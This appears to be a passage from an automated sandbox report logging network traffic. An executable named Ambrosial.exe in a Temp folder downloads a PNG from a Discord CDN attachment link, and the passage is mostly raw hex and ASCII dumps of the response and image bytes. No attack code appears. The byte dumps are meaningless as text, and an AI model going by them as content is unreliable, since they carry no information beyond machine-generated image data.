                                                                                                                                                                                      2021-10-30 11:52:26 UTC833INData Raw: ee 25 ed 76 b1 72 bd 2a b8 e6 d4 57 7d 3c a7 12 90 ae fb 08 aa 78 92 3e 6a 46 fe 4e aa 3c f0 78 22 5f f5 79 b8 a4 30 4f 25 9e 37 f2 55 b1 cc a9 62 92 2a 46 0d fb ad f6 4f ce a8 be ca e9 7c 5d 9d 24 cf 88 ba 5d 51 ad ef c9 7b ae 8a f7 42 4f 9f 46 9f c7 c7 4a 14 e3 b9 ed 7a f5 dc 47 27 0f a1 8f 44 ba af 45 72 57 b2 3a df d2 ff fa 74 aa 38 a2 bf 2a af 5f d3 b0 8b fe 01 eb ea df ed a4 2f a0 fb 98 f2 1d df f1 1d db bf a7 4a 5f 08 7a c1 53 3d 37 44 4a c6 b0 99 d7 75 89 e0 cb 85 2f 9c 23 5f 36 fc ca 0b 17 f5 43 44 f5 45 a7 51 b9 1a 95 a7 11 49 fb c8 4f d3 f4 b7 36 25 9c 07 37 3e 37 3f 3a 1f 0e 74 f7 93 a7 9f cc fd ed bf fd b7 af 3b af f3 b1 1f fb b1 6d 6f 8d fe a1 cd 18 c2 b5 5a 85 6b ed e2 d7 9d 7e 8c 42 67 ec f8 d9 a7 70 6d 3e fd d3 3f fd ea 2f fc 85 bf 70 5d
                                                                                                                                                                                      Data Ascii: %vr*W}<x>jFN<x"_y0O%7Ub*FO|]$]Q{BOFJzG'DErW:t8*_/J_zS=7DJu/#_6CDEQIO6%7>7?:t;moZk~Bgpm>?/p]
                                                                                                                                                                                      2021-10-30 11:52:26 UTC834INData Raw: fd d2 69 ae db 01 eb a9 d6 80 ec b2 52 c7 bc 49 f7 50 e3 5e 42 60 a4 67 6e e2 39 2e 1e ab ee 67 c0 76 bf eb 8e c7 93 aa 96 39 81 58 e6 ce 04 d2 ee f0 da 99 24 55 ce aa 40 15 93 e8 3c 56 7c 0e d7 ce 85 bc b4 77 05 a4 7b 2f 7c 2e 82 1c 17 91 b9 e4 83 fb 55 e3 b6 24 73 2a 3c 5e e5 a4 5f ba cf 85 8f 11 bd da 03 7b eb f4 d1 4b 15 3e 84 bc 1c c9 ad c6 14 70 fd ff 06 2e f2 a2 76 f4 a7 69 fa 09 ca e8 0b c0 fd 99 83 3d 92 23 bf 57 4d 3f 55 7b 97 77 79 97 9b 2f 3f f4 ca 2f 2f 51 c5 fc 0b d8 e3 d8 bb a8 8e b5 ec 4a b5 0e 78 c0 03 1e 70 f5 98 c7 3c e6 da 5a e7 6b be e6 6b 6e f9 30 a4 e0 e7 83 e1 e2 74 31 7e 2f db 0e fa 1b bb fa 0b 11 b9 df 99 70 46 3b 68 ad dd 1c ee af f4 ea 9a 78 bc 13 8f eb 3f 3e 3e f0 03 3f f0 f4 cb 82 6f 07 3e af 04 df 25 e1 0c 5c 2e 89 df 4f ae
                                                                                                                                                                                      Data Ascii: iRIP^B`gn9.gv9X$U@<V|w{/|.U$s*<^_{K>p.vi=#WM?U{wy/?//QJxp<Zkkn0t1~/pF;hx?>>?o>%\.O
                                                                                                                                                                                      2021-10-30 11:52:26 UTC836INData Raw: e0 3e 8f 55 fe 14 a8 7c 90 31 b7 53 66 71 09 60 f3 d9 a8 72 ce 41 7d f3 79 39 12 9e af 29 7c 27 4b e7 bb d7 bf 7f d3 1e 89 e6 61 2d d5 28 3a 5d a4 7d 49 4e ff eb f3 08 7a 41 d3 8b da 2e fa 69 9a fe 57 8d e6 95 f8 41 e5 41 a7 4d be d7 32 7a 6e ca 4f fe e4 4f 1e fa 27 79 f4 8b 73 d5 bb 9a 53 7d dd cf 5c 55 be db 97 82 5e de 73 36 87 3e 64 47 fe a6 e7 8b 5f fc e2 d3 bf a1 ea 1f 54 3d 98 1c e6 46 d8 b7 8b ce a7 ca 4b 9f e4 57 7e e5 57 4e ff 0b 74 17 fd 54 ed f5 5e ef f5 ca 9e 29 47 c8 3d 21 22 7b a7 2d d2 4e aa 18 35 2e f8 41 ba 7e d5 cd 17 7c c1 17 5c 7b ce c3 7b 0b e6 4d ff 5d c5 25 e7 9d f5 3a 77 9f dc 0f 09 9f 1d ff b2 4b 1d 01 d7 85 e7 64 de 6a 2c f1 98 bf 70 78 cc 75 6c e0 45 c6 65 f4 02 b7 22 f4 99 f9 1d f7 a1 cf 84 5e 8e 7c d5 fa 21 75 b7 05 be 4a 56
                                                                                                                                                                                      Data Ascii: >U|1Sfq`rA}y9)|'Ka-(:]}INzA.iWAAM2znOO'ysS}\U^s6>dG_T=FKW~WNtT^)G=!"{-N5.A~|\{{M]%:wKdj,pxulEe"^|!uJV
                                                                                                                                                                                      2021-10-30 11:52:26 UTC837INData Raw: 79 f2 cf 22 3a cf c2 7c 19 23 df eb dc 4e bf 44 c8 0f f8 ba f1 ae 60 fa a2 a6 c5 b8 1c fd 69 da 37 7d d3 37 dd ec a1 43 e0 30 f1 09 74 a4 3a cc 4e a7 5e 3e ff f2 62 1e 7c 2f 7c e1 0b 6f de 78 ab 3c e8 41 0f 3a fd c3 d8 82 1b ce 45 fd 46 b6 fb 77 e1 65 4b b5 12 b7 bb 11 c1 3e fa d3 34 fd 2b 01 de cf e1 cc c1 6d ce 3e f5 0e cf f5 51 e8 da e9 17 bb ea cf 37 ee 92 ff ab b7 5a 87 fa ef 92 7d 64 9f 23 4e fa dd d6 5a f3 fe f6 1c c7 7d 3f f1 13 3f 71 fa 5f a1 2b ff b0 3b 75 5e 0f 69 ef 50 f5 ea a4 62 16 4f 32 6f a5 ce e7 c8 7c 7d 7e 93 51 4f ae 15 f0 0c 58 65 25 b7 cb 61 2e 97 0e 62 a3 5c 8f 1d 95 ea 19 92 f1 cc f5 38 32 82 3a 04 b2 be d2 47 be 91 40 da 15 5e 57 09 54 31 49 ee 0f a9 6a a0 b3 11 ef 21 f0 39 e4 02 b6 0b a0 57 3e 91 f9 ab 54 9f 35 ff ac 22 f8 f5 d9
                                                                                                                                                                                      Data Ascii: y":|#ND`i7}7C0t:N^>b|/|ox<A:EFweK>4+m>Q7Z}d#NZ}??q_+;u^iPbO2o|}~QOXe%a.b\82:G@^WT1Ij!9W>T5"
                                                                                                                                                                                      2021-10-30 11:52:26 UTC838INData Raw: 62 e5 b2 03 6b a5 9f 74 f5 ac c4 e7 55 9e fe f6 8b fe 65 85 5d f4 cb 6d 7f e1 17 7e e1 da 7a 35 d5 0b ba 5f b7 15 bd 43 7b 04 74 f7 f9 99 c9 7f e4 a7 6a fa 25 bf fa cb 14 aa af e6 3b 97 aa cf ac f7 ea 39 ed ae 51 f9 5e 93 f5 69 bf e0 05 2f b8 e5 7f 73 53 9f 3d 2a ff 0e d9 03 49 2a 5f 45 97 d7 9d a5 fb ab 5a c5 47 d7 a1 63 75 bd 70 74 1e d0 7c 08 b8 2f 63 23 46 75 3c 77 32 2e bf 0b 64 de 11 c9 de 48 e6 c1 aa 9f 58 e7 17 6e a3 33 3f e0 af 64 06 39 59 97 92 54 39 12 c7 ed 2a 2f 7d 29 90 b6 f0 bc 14 e2 39 a2 fb 35 14 c4 32 37 45 f9 a9 7b 2f 89 7f df f1 fd 97 39 12 ff 7e d4 28 9f eb 2e 39 77 27 be 76 74 1f 9d ca 07 a3 58 b2 f4 23 b2 cf f9 9c cf b9 d6 d6 79 c9 4b 5e 72 fa 5b 66 5a 4c 6e be 7a 68 12 cb 43 73 71 9f 5f 24 cf c1 2f bd bb 18 12 e5 7c c9 97 7c c9 f6
                                                                                                                                                                                      Data Ascii: bktUe]m~z5_C{tj%;9Q^i/sS=*I*_EZGcupt|/c#Fu<w2.dHXn3?d9YT9*/})9527E{/9~(.9w'vtX#yK^r[fZLnzhCsq_$/||
                                                                                                                                                                                      2021-10-30 11:52:26 UTC840INData Raw: 17 5d 4f 50 ef 51 bd e8 e2 fe ac e8 98 f5 5e 65 65 ae 15 46 7d 3c 76 ce 7c ab b5 99 c7 97 f1 0a ab fb 58 65 a7 9f 6c f7 1d 99 ef 76 e2 eb 19 9d 69 b7 ee d1 7e aa 7d fb 98 3e e6 af 72 73 44 b0 f3 65 ca 85 1c c9 28 4f 42 ae af a5 8a c3 c8 d7 51 c5 67 35 ce 4e ee e9 45 ed 5a bf 85 7c d8 8c 1e 3e 4c 38 9b f8 e8 c3 cf eb a4 63 a7 df 47 e1 7a b2 bb d6 59 df 95 fc ae 87 eb a3 2f d5 9d 3e 22 6d 51 f9 9c 8c e7 17 6c 37 5f a7 27 3b 35 e9 5b 5d 8b 18 d9 e8 99 23 aa 3c 31 ba 2e b0 ea ef f2 92 dd ba 51 fe ca 7d 05 d5 3c ee 1b e5 a3 57 3d 44 5e 43 d1 e5 3a a3 9c 6a fe 15 32 d7 9f 09 55 9f ee 99 b1 ba 36 91 3d 66 cf a1 64 37 1f b4 8e aa f6 9c f5 cc 72 47 2f 0c 62 77 2f ab f9 bb 7d a1 aa c3 97 63 22 ff e8 3e a8 e8 7a 1d 21 cf 3a 7b 8f d6 0d 55 0e be 2a 4f a3 bf 08 31 ba
                                                                                                                                                                                      Data Ascii: ]OPQ^eeF}<v|Xelvi~}>rsDe(OBQg5NEZ|>L8cGzY/>"mQl7_';5[]#<1.Q}<W=D^C:j2U6=fd7rG/bw/}c">z!:{U*O1
                                                                                                                                                                                      2021-10-30 11:52:26 UTC841INData Raw: 72 ab da d5 97 21 d1 cd 5d f9 67 3e e9 99 93 f6 ca da b2 c6 19 e5 ac d4 8d 58 c9 b9 2b a8 d6 71 e4 81 dd 71 c9 5e 70 6e cf aa be eb b9 32 d7 ee 7a ba 7c be c4 2b 76 e7 10 47 6a 9c 9d fa db 35 57 e5 77 9f eb bc 48 09 8d 9d f8 0b 17 42 8d bf 48 b9 9e 79 dd 88 2e fc 7a ba 3f eb a0 ca 81 5d 5b 54 be 8a d5 3c b8 64 df 51 ce 1d cf a6 cb fd ad cf 9d 07 dd 64 51 d7 da 9d 7b 62 77 7e 48 5b b8 6f 47 77 1f 54 3e c8 58 d5 d3 b9 2b 5e d4 76 ec d9 4b 9a c8 7a 98 e5 67 5d d7 47 74 eb 80 51 ad 58 a9 e9 7a 1c ad ad ae e5 39 73 80 fb d1 2b 9f e8 7a 38 b3 b3 15 a3 9e 2b 73 cc 72 56 7a dc d5 f8 9a 56 1f c2 bb dc 8e be 3b 3d ab dc 73 eb c5 4e 0f ff e2 16 3b b5 70 a4 a6 e3 68 af 73 d6 30 aa dd 89 b9 ed 2f 54 8c 9d 28 57 82 4d 3e 3e ef e5 82 6f 34 52 2b f0 89 4e 17 ab 31 58 c9
                                                                                                                                                                                      Data Ascii: r!]g>X+qq^pn2z|+vGj5WwHBHy.z?][T<dQdQ{bw~H[oGwT>X+^vKzg]GtQXz9s+z8+srVzV;=sN;phs0/T(WM>>o4R+N1X
                                                                                                                                                                                      2021-10-30 11:52:26 UTC842INData Raw: f7 3d b6 8b bf 94 b9 2e d1 4b 9a bf 80 a5 e0 17 d4 8a 1c 85 eb 22 6d 71 8e 2f 19 e5 ac d4 77 ac d6 5e 32 6f 96 73 c7 f5 bd f3 8b 9a d8 7d 08 ad e6 8f f2 66 3d 8e d4 56 7e f7 a1 e7 98 54 35 62 37 7f f6 62 b4 d2 4f 60 bb 7f a5 d6 f5 a3 6b 81 95 f9 04 b6 fb 67 bd 47 8c 6a 57 5f da 56 d6 34 b3 a1 ea d1 ad a3 ca 4d d2 7f 6e 9e b3 fa 70 a9 7a ad f4 df e1 d2 fd c4 ea f5 77 56 cf 64 44 f6 bd 44 4f 41 df 51 bf 95 17 82 d5 f5 ec ac 7b 77 8f 9e 8f 7e c9 75 f9 35 d8 59 db 4e ee 0a 97 ba 1e 99 53 d5 74 39 1a 11 ad 87 97 2c 6c f4 fc df 9e 82 b8 70 9f 48 7f 8e 90 b6 38 c7 97 8c 72 56 ea 3b 56 6b 77 e6 38 77 3f 57 57 57 57 ff 1f d4 a5 c3 bc 03 2e 79 14 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                      Data Ascii: =.K"mq/w^2os}f=V~T5b7bO`kgGjW_V4MnpzwVdDDOAQ{w~u5YNSt9,lpH8rV;Vkw8w?WWWW.yIENDB`


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      12192.168.2.349790162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:29 UTC843OUTGET /attachments/489891892142669842/835691740962226216/ataraxiaback.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:29 UTC843INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:29 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 40189
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a6470105dfd68fd-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 2409306
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "daa4e4c20057e3e41838baec248e875e"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:29 GMT
                                                                                                                                                                                      Last-Modified: Sun, 25 Apr 2021 01:40:37 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1619314837465564
                                                                                                                                                                                      x-goog-hash: crc32c=bIk6BA==
                                                                                                                                                                                      x-goog-hash: md5=2qTkwgBX4+QYOLrsJI6HXg==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 40189
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdsiGOBhCGFpMDOFb_GJGCmYrPyyEUGTRH0jmnTWqXZ0LJtzdO_dWwtVs9T55JJoPlHt75mw7Cm2u4oDhq-PNcOo8INaEA
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6gwZTx%2FCQ%2BLzlnqOmdaQ2d8UCUWPTLOQcPHnGWYymjH4DG2RoQ8Rnfi75QQDGOXWweVZZmVeJF8mI%2FLmmMtbeQ5XWLIzeQFTUiMquJOBPMhzZ8%2BVaUVgUsC1oPtpaDBe9Rr69w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:29 UTC844INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:29 UTC844INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 9c 92 49 44 41 54 78 5e ed 9d 09 a0 7d d5 f4 f8 f7 b7 10 42 45 64 0a 3f f3 0f 3f 99 67 c9 90 10 32 54 34 6a d2 2c 4d 1a 34 2b a5 54 1a 54 df e6 79 2e 0d 2a 95 a8 90 90 a1 64 8a a8 94 06 15 45 fe 42 ea bf d6 de 6b ed b3 f6 3a 6b 9f b3 cf b9 f7 be ef 7b ef 7b 3e b5 ce 5e d3 1e ce 3e fb 9e b7 bf e7 dd 77 ef 9c 5b af fa cf 23 6e 3e 46 9f 7c b4 e7 b0 3e c7 97 ec 7f 84 fc 89 48 9f d7 ab 3a 0f eb 7c b0 11 b6 73 cc a1 20 a6 a3 ee 4b a9 43 b9 c0 23 d8 13 96 c1 a7 4b 99 eb 4b a1 23 7e 94 89 3d 1f 03 f3 a0 31 5c 06
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^}BEd??g2T4j,M4+TTy.*dEBk:k{{>^>w[#n>F|>H:|s KC#KK#~=1\
                                                                                                                                                                                      2021-10-30 11:52:29 UTC845INData Raw: a3 76 35 5f 53 34 79 d5 23 ee ce f4 ae d8 8e 6f 1a 0e 5e d8 26 99 0e 74 58 c2 91 a6 3a 7d 62 5d fd 48 53 2c 32 5d 26 79 60 7a 52 b4 88 0a a0 76 9a 96 5b d1 52 1c d7 78 7a 52 1b 63 cb 79 e9 4d 9a c4 b2 13 c1 5f 49 ca f3 05 dd d7 e1 92 60 3d 89 89 9c 24 37 b6 47 6d 47 3b e4 c9 dc 1a 9c 6f c8 7c b1 51 c3 73 cd 02 33 a7 e3 6c 3f 02 3f d9 1a eb 0a 30 2f b7 69 43 a2 cf e8 8f 61 7f 2e 8e 34 5e 68 22 c9 91 8d 79 bd a9 f5 81 46 70 62 5b 2f 40 98 df a2 54 8b 5e 95 3a a0 da e7 71 b2 e4 69 8e 8e 83 da 52 25 f4 8a cd ad 60 f4 e7 62 48 53 3d 8b 3e 6d 25 d0 94 15 e5 0e 0c 28 ac 57 1c bf 4e 59 2c 72 f5 a6 3b a5 e7 13 ed 86 17 56 dc 24 81 a0 ae 37 4d 12 1f c7 12 0d d2 65 e9 b1 ea ea 5c a2 a6 ab ba e8 b3 a4 89 f9 f6 3d 6a 7e ee d4 ec c8 f9 d4 ba 17 c8 8f ba b2 25 b9 18 fa
                                                                                                                                                                                      Data Ascii: v5_S4y#o^&tX:}b]HS,2]&y`zRv[RxzRcyM_I`=$7GmG;o|Qs3l??0/iCa.4^h"yFpb[/@T^:qiR%`bHS=>m%(WNY,r;V$7Me\=j~%
                                                                                                                                                                                      2021-10-30 11:52:29 UTC847INData Raw: a1 d9 e2 f9 a9 95 10 af e6 2e 24 5b 1b 2f cb 4e 09 75 19 ce 45 ea b9 0d 94 26 1b 79 c9 08 64 bc d3 00 06 c6 0e 5e 98 ec c5 c9 53 ab d6 46 e7 0a dd c8 8d 9a fd 76 29 9f 8b b5 40 63 97 f9 8f a8 3b 9b d9 16 d4 f3 af 49 3e 7f 2d 04 d6 cd d5 67 a9 b5 51 88 d9 ee c0 40 21 4d 4b 2d c6 72 8b 8c fc 66 1b 46 1d 99 d7 67 e3 30 56 32 fd fb 31 aa 18 8f 3b 96 ea bc bd 0d 82 b6 dc 40 b1 d4 10 f9 1e d6 8d 12 e1 bc 98 cf 01 2a 98 18 e7 fa 0a 1c a7 e5 cf 31 6b 36 6a 6a 9e 3c d2 a7 e3 6c cb 0d 57 f6 57 9e 3d 6d 46 ea 5d 81 a6 22 ac e7 4a 9b aa f7 24 4f 0c aa b9 fe c0 58 c1 c9 8e 13 ee 57 4b 50 5b e0 6a c5 d7 aa 53 b2 41 41 dd 38 f2 c2 7e 38 bf ad 94 68 5f 2e c7 f2 4b fc 6b 92 e7 c4 12 a2 ad 9d 1c 7d eb 0d 0c 78 1a 16 90 58 9e 45 a8 25 5d c3 c7 8c fe 72 75 ba f6 df 46 49 3f
                                                                                                                                                                                      Data Ascii: .$[/NuE&yd^SFv)@c;I>-gQ@!MK-rfFg0V21;@*1k6jj<lWW=mF]"J$OXWKP[jSAA8~8h_.Kk}xXE%]ruFI?
                                                                                                                                                                                      2021-10-30 11:52:29 UTC848INData Raw: f3 cf 39 99 cb ba 8c e1 b7 0e b0 8e 6d c4 1c 3c c8 bc a0 56 60 4c c4 3d 5c df 28 99 f8 93 9f 63 04 eb ba cc 92 b4 d9 ce 8c da a8 89 73 4b 88 7e 71 c6 ec c3 d2 da a4 79 94 8f 6f d2 2c b5 19 f4 76 e5 ac e5 63 49 e1 68 2b e9 8d 51 99 47 22 77 fb 08 fa 59 24 da 1e 98 89 c0 45 1e d7 86 8d da d0 4b 0b ed ca 97 7e 2c 06 eb a5 25 e2 75 e8 ab 8a 81 96 d8 80 1a 0b 96 fe b5 24 fc 1c f3 70 0c 04 db 4b 47 59 0e b7 9b 6b 3b cc 35 8b f0 0f 0c 8c 91 b8 a4 92 85 d8 03 aa 5f ba 4c e3 cf 0e 40 e7 8f 75 99 8b 71 49 bc ad 62 3c 26 6d 23 49 4c e9 49 3e d9 ec 63 d8 17 63 a2 0d 6f 1b 25 e2 e3 94 8b c4 18 f7 cb 31 91 63 21 db ec c2 8c fe 63 02 24 ce 0b cc 80 9e 2b bf 41 43 a1 98 9c 43 bd c9 2a b3 ab 5f 77 ca 38 83 3e 5f 86 22 89 31 96 2f 97 e8 9b f3 b1 90 40 cd c7 d2 aa 17 63 84
                                                                                                                                                                                      Data Ascii: 9m<V`L=\(csK~qyo,vcIh+QG"wY$EK~,%u$pKGYk;5_L@uqIb<&m#ILI>cco%1c!c$+ACC*_w8>_"1/@c
                                                                                                                                                                                      2021-10-30 11:52:29 UTC849INData Raw: e5 98 f9 46 e9 fb 13 f9 11 55 cf 23 db a5 52 a3 fd c5 f3 28 fb b3 ea 64 da 91 4c cb 8d 5a db b8 75 dc da a4 79 9d 05 7c 8d b6 17 fc 55 67 7e 93 c6 b0 1f c9 95 23 03 0d d1 69 d4 ca 26 7c ce d8 06 31 30 53 f0 97 dc b8 ee da 25 6d d4 d9 96 a5 14 a4 a9 cc 09 62 95 f2 b5 c9 44 1d 63 20 9c a3 f1 79 94 13 16 7a 03 32 af 24 5f 32 4a dd 1c 49 7b 70 26 b9 3b fc b8 90 fd 0d cc 28 c6 76 c9 70 99 41 51 dc 9e 5c 92 6a 79 e6 da 30 fd 54 b7 a8 8e e8 27 d9 74 81 1e f3 bc 1e 82 f2 65 93 e4 63 a9 6c 6e 23 da 1a 9d 2f e1 18 95 88 6c 17 49 ea 51 5f 1a f6 99 7d 74 64 c6 bc 47 4d cc 59 3c f3 e0 0b 86 8c a3 1e 05 c2 ed 76 f5 7e 34 4b 90 c4 a6 36 10 5d 76 c6 a8 18 ce a8 8e f7 43 3e c7 65 5e 63 9d 81 59 09 2e 1d 7b dd d5 7f 09 2a 6d af c3 01 4b f6 d7 4a 11 cf 09 62 95 f2 35 86 e8
                                                                                                                                                                                      Data Ascii: FU#R(dLZuy|Ug~#i&|10S%mbDc yz2$_2JI{p&;(vpAQ\jy0T'tecln#/lIQ_}tdGMY<v~4K6]vC>e^cY.{*mKJb5
                                                                                                                                                                                      2021-10-30 11:52:29 UTC851INData Raw: fa d4 41 ac 7a 20 e9 f8 32 18 f5 3a 91 ad cb bd b7 8c 22 5b 7f cc 4c 55 3f f3 1b e2 d2 f2 b4 ea e9 f5 b6 5a 02 b8 29 c8 5d 06 8e c9 52 92 ab c7 f8 3a 42 24 56 5d f6 c5 52 f4 c7 ba 6f 4b e8 5c 36 d5 f5 80 cd 31 24 ea 3a 4f 62 c5 64 df 22 9e b4 1d fd c1 2b 63 48 72 5e 54 7a ac fe 04 ba 1d 8b 69 fd 57 9f bc 09 62 9f 8e a1 9d f3 79 f1 7f d5 59 91 c6 42 19 51 75 11 99 a3 4b 44 ea e3 02 ba 34 f1 7e d1 a1 cc 8b 7a d3 80 32 75 07 a6 1f 78 a9 ac 4b c9 1b 26 46 e6 f1 c6 2a e8 a2 84 83 e5 8f 02 87 c4 f6 52 b6 49 43 2c 9d 6d a6 e6 c7 05 68 88 7f bd a1 80 69 93 8f 78 44 5b 5e 4a d0 75 92 7a 72 e4 52 08 ca e7 71 a7 75 1b e0 5c 29 a5 64 eb 35 8c 53 92 ad 3f 66 a6 aa 9f f9 80 a6 e9 6b 9b 5a dc 3c f4 9d 7e bd 71 6a 23 e6 89 3e 7d 29 6d d1 66 d2 7e d4 41 11 f9 ec f7 08 5d
                                                                                                                                                                                      Data Ascii: Az 2:"[LU?Z)]R:B$V]RoK\61$:Obd"+cHr^TziWbyYBQuKD4~z2uxK&F*RIC,mhixD[^JuzrRqu\)d5S?fkZ<~qj#>})mf~A]
                                                                                                                                                                                      2021-10-30 11:52:29 UTC852INData Raw: b6 d0 31 0f d0 63 98 57 e3 e8 41 e3 50 e9 92 f8 9c c2 cb e3 2f 27 e9 16 8d b1 5c 1f a2 4d 5d 9f c7 26 e3 b5 5c b8 f9 44 9f ec 43 e8 31 57 51 b5 41 25 90 cb 2d 86 da f2 ed a8 b1 33 7a 2e e6 60 d4 1a 03 d7 57 f9 1e cb 27 51 f1 89 6f d4 72 e3 89 7e 71 8e 56 49 1b 56 8f b7 51 a8 ce a8 36 e3 75 e5 43 92 1c 88 4b 74 6e 09 aa 89 1a 71 01 a8 c6 b9 9e 2e 19 69 b7 f5 31 30 ef c8 ad 19 de 28 31 a8 b3 1d f4 70 55 a5 cf 97 a0 84 78 46 e0 50 e5 18 1b 34 ca a9 7e 0d 9a 0a 62 e9 6c f7 a1 b5 3e 9e aa 96 49 32 ce be 74 5b be bd 0e 33 56 ab 5b 27 69 a9 20 3f d2 25 57 e3 eb 40 cf 52 fa a0 c7 c0 32 d5 cc eb fe 27 48 c9 a9 f9 4b 88 65 30 2b 5d 5c 56 be c4 b2 8d 78 e9 a9 e4 76 12 a4 4f e8 dc 1e c2 7a b8 23 91 1e 7d 76 99 b4 0b 48 ff 48 8c 52 3f 19 53 d0 e4 18 25 ec d7 65 1b 9c
                                                                                                                                                                                      Data Ascii: 1cWAP/'\M]&\DC1WQA%-3z.`W'Qor~qVIVQ6uCKtnq.i10(1pUxFP4~bl>I2t[3V['i ?%W@R2'HKe0+]\VxvOz#}vHHR?S%e
                                                                                                                                                                                      2021-10-30 11:52:29 UTC853INData Raw: 0c 29 6e ab 27 93 6a 5f b5 95 6b 3a f1 f3 34 40 c9 c3 c9 d5 43 64 ac b6 71 22 d0 af db f1 3a f9 91 a4 6e d4 41 11 39 d9 7c 44 e6 01 d2 2f 91 39 a3 60 b6 53 d0 57 dc 88 11 3e 47 f9 34 ba 9d d2 73 18 cb 13 b5 dc d8 12 bf 18 11 fb 65 dc da 50 b5 6f c2 c2 0f 8a ca 16 3a d9 0c fb 70 1c be 04 74 89 48 9d b1 7c 63 03 7e 3a 8a 61 d6 16 ad 8c e1 40 12 1b 90 79 3a c6 e4 fc 03 a3 93 5b 1b e8 f7 31 52 a2 4d b0 ce fe 20 b4 9e e1 80 25 52 c5 94 c0 01 f3 b3 1b 30 38 d4 7c 96 c0 8b 04 05 57 49 e8 3f 8c 81 d1 f9 75 d2 7c c4 ce b3 99 96 6b 93 5f 4c 2c 93 46 f7 57 eb b3 f9 0a 58 75 5b 6a d4 eb 50 bd 22 fa d6 b5 ea a1 74 45 d5 af dd f7 bd d4 ff b3 b2 74 5b 63 47 b7 3f 62 1f ba ba b4 a3 8e a7 66 41 7e 1e 86 16 19 d7 25 eb 92 e8 a7 69 44 ac d2 df 21 64 8e d2 13 44 0c 89 ba ca
                                                                                                                                                                                      Data Ascii: )n'j_k:4@Cdq":nA9|D/9`SW>G4sePo:ptH|c~:a@y:[1RM %R08|WI?u|k_L,FWXu[jP"tEt[cG?bfA~%iD!dD
                                                                                                                                                                                      2021-10-30 11:52:29 UTC855INData Raw: 9c 94 22 d7 d6 b0 16 3b 82 93 a1 65 6c c0 55 e4 9f b8 e3 68 5b 8e 51 b4 c7 eb a5 48 a0 0e 8b 6c a3 08 59 a7 4b dd 3e 75 80 64 8c 1d ea d1 99 06 b5 77 1b 19 ac 36 c0 a7 dd c5 dd 89 61 ea 21 23 71 f9 48 41 7f 08 7b d0 e7 4b 6a 20 d6 c5 03 e5 23 55 1e 41 76 8d 9c 7f 0a 91 e7 d7 88 1a ab ac c7 e7 8b 24 df 59 60 9d 1f f9 92 fa 54 16 6f d4 9a e6 cd c7 b0 45 10 99 c7 3a 96 9c 13 75 0f 5c 56 e1 8b a2 7d d2 ce e4 33 ec 93 63 d1 25 22 eb 48 64 4e 5f b8 69 dd 45 b0 ab 1e 62 dc 1a 20 11 db 12 31 f4 cd e1 9f c4 19 62 3d 2a 07 ca 69 9a d9 24 06 86 bc 0c ac 62 29 f5 58 c2 c1 6f a2 e0 aa a0 6d 0a 1c 52 9f c8 85 43 3d 2e 85 36 69 66 2c 08 a2 ed 26 4a 72 8a 18 16 62 37 fc 8b 5c c8 58 a0 ab ae db 1e b5 fd 71 b4 37 4a 1b 7d ea 75 a8 93 bc 56 3a d4 0b 70 ed d8 42 bd 8d a2 76
                                                                                                                                                                                      Data Ascii: ";elUh[QHlYK>udw6a!#qHA{Kj #UAv$Y`ToE:u\V}3c%"HdN_iEb 1b=*i$b)XomRC=.6if,&Jrb7\Xq7J}uV:pBv
